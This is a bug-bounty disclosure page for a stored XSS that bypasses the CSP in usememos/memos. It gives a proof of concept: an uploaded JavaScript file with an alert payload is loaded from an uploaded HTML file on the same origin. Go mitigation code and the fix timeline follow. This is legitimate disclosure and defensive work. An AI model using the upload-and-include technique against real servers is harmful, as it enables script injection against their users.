Stored XSS with CSP bypass through JS file upload in usememos/memos

Valid

Reported on

Dec 26th 2022


Description

I've seen here: https://github.com/usememos/memos/blob/main/server/resource.go#L268 that the CSP has been implemented with the "default-src 'self'" configuration. This configuration can be bypassed if I'm able to upload a JS file and then call it from another file while they both reside on the server.

Proof of Concept

  • Upload the first file on the resources: test.js
      alert(document.domain);
  • Now get the link of this uploaded file, which for me is: http://localhost:5230/o/r/12/test.js
  • Now upload an HTML file pointing to that URL, made like this:
      <!DOCTYPE html>
      <html>
      <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
        <title>Test</title>
      </head>
      <script src="http://localhost:5230/o/r/12/test.js"></script>
      <body>
      </body>
      </html>
  • Now get the link to this HTML file, which for me is: http://localhost:5230/o/r/14/test.html
  • Open the file in the browser, and that's the result:

[image: screenshot of the result]

Impact

It is possible to obtain a stored XSS bypassing the CSP currently implemented.
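The bypass works because the server hands back uploaded files with their natural media type, so the browser executes test.js as a same-origin script and renders test.html as a same-origin document. The example below is added here as an illustration of the usual mitigation for a resource-download endpoint; it is not the project's code and not the fix from commit 46c13a (the page does not show that diff). The function names resourceHeaders and serveResource, the activeTypes table and the sample uploads are all constructed for this example. The three headers it sets are standard browser behaviour: X-Content-Type-Options: nosniff makes the browser refuse a <script src> response whose declared type is not a script type, Content-Disposition: attachment makes the browser download rather than render the file, and a Content-Security-Policy: sandbox with no allow-* tokens gives any document that is still rendered an opaque origin and no script execution.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"path/filepath"
	"strings"
)

// activeTypes are media types a browser will execute or render as a
// document when served inline; the report's PoC relies on .js and .html.
// Constructed list for this example.
var activeTypes = map[string]bool{
	"text/html":                true,
	"application/xhtml+xml":    true,
	"image/svg+xml":            true,
	"text/javascript":          true,
	"application/javascript":   true,
	"application/x-javascript": true,
	"text/ecmascript":          true,
	"application/ecmascript":   true,
}

// resourceHeaders builds the response headers for one uploaded file.
// Assumed mitigation (not the project's actual fix):
//   - active content is relabelled text/plain and sent with nosniff, so the
//     browser will not run it as a script even when referenced by <script src>;
//   - attachment disposition makes the browser download instead of render;
//   - a sandbox CSP gives anything that is still rendered an opaque origin
//     and no script execution, so it cannot reach the app's cookies or DOM.
func resourceHeaders(filename string) http.Header {
	h := http.Header{}
	ct := mime.TypeByExtension(strings.ToLower(filepath.Ext(filename)))
	if ct == "" {
		ct = "application/octet-stream"
	}
	base, _, err := mime.ParseMediaType(ct)
	if err != nil || activeTypes[base] {
		ct = "text/plain; charset=utf-8"
	}
	h.Set("Content-Type", ct)
	h.Set("X-Content-Type-Options", "nosniff")
	h.Set("Content-Disposition", mime.FormatMediaType("attachment",
		map[string]string{"filename": filepath.Base(filename)}))
	h.Set("Content-Security-Policy", "sandbox; default-src 'none'")
	return h
}

// serveResource writes an uploaded file's bytes with the hardened headers.
func serveResource(w http.ResponseWriter, filename string, body []byte) {
	for k, v := range resourceHeaders(filename) {
		w.Header()[k] = v
	}
	w.WriteHeader(http.StatusOK)
	_, _ = w.Write(body)
}

func main() {
	// Constructed sample uploads mirroring the report's PoC files plus a
	// harmless image, to show which ones get relabelled.
	uploads := map[string][]byte{
		"test.js":   []byte("alert(document.domain);"),
		"test.html": []byte(`<script src="/o/r/12/test.js"></script>`),
		"photo.png": {0x89, 'P', 'N', 'G'},
	}
	for name, body := range uploads {
		rec := httptest.NewRecorder()
		serveResource(rec, name, body)
		fmt.Printf("%-10s -> %v\n", name, rec.Header())
	}
}
```

Serving uploads from a dedicated origin (a separate hostname that carries no session cookies) is the stronger long-term control; the headers above are the minimum that stops the script-include and inline-render steps of the PoC on the application's own origin.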

We are processing your report and will contact the usememos/memos team within 24 hours. 5 months ago
We have contacted a member of the usememos/memos team and are waiting to hear back 4 months ago
STEVEN validated this vulnerability 4 months ago
leorac has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.10.0 with commit 46c13a 4 months ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 4 months ago
resource.go#L268 has been validated